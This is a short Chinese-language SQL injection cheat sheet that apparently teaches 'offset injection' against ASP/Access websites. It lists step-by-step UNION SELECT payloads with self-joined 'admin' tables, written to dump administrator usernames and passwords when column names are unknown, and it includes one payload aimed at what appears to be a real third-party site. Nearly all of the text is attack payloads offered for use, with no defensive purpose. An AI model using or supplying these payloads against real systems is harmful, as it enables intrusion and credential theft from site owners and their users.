注入语句:
1、进行偏移检测
http://xxx?Id=3 union select 1,2,3,4,5,6,7,8,9,10,11,12, from admin
2、* from (admin as a inner join admin as b on a.id=b.id)用这里的替换一下,减少字段的数量只到网页返回正确就可能爆出账号密码
3、a.id,b.id,* from (admin as a inner join admin as b on a.id=b.id)
4、a.id,b.id,c.id,* from ((admin as a inner join admin as b on a.id=b.id) inner join admin as c on a.id=c.id)
从1-4一步一步的尝试
此方法解决90%注入得到表,得不到字段的网站,但是条件有局限,必须要有id,有些偏移不出来
如一个网站有13个字段 order by 13 正确 14错误
http://xxx?Id=3 union select 1,2,3,4,5,6,7,8,9,10,11,12,13 from admin(猜解的表名)
- 测试 admin表有几个字段
http://xxx?Id=3 union select 1,2,3,4,5,6,7,8,9,10,11,12,* from admin
http://xxx?Id=3 union select 1,2,3,4,5,6,7,8,9,10,11,* from admin
http://xxx?Id=3 union select 1,2,3,4,5,6,7,8,9,10,* from admin
这样一个一个的尝试
http://xxx?Id=3 union select 1,2,3,4,5,6,7,8,9,* from admin
13-9=4 这样admin就有4个字段
4+4=8 13-8=5
http://xxx?Id=3 union select 1,2,3,4,5,* from (admin as a inner join admin as b on a.id=b.id),将一直往前提只到返回正确为止
http://www.kztsjj.com/product.asp?id=43 union select 1, from (admin as a inner join admin as b on a.id=b.id)
a.id,b.id,* from (admin as a inner join admin as b on a.id=b.id)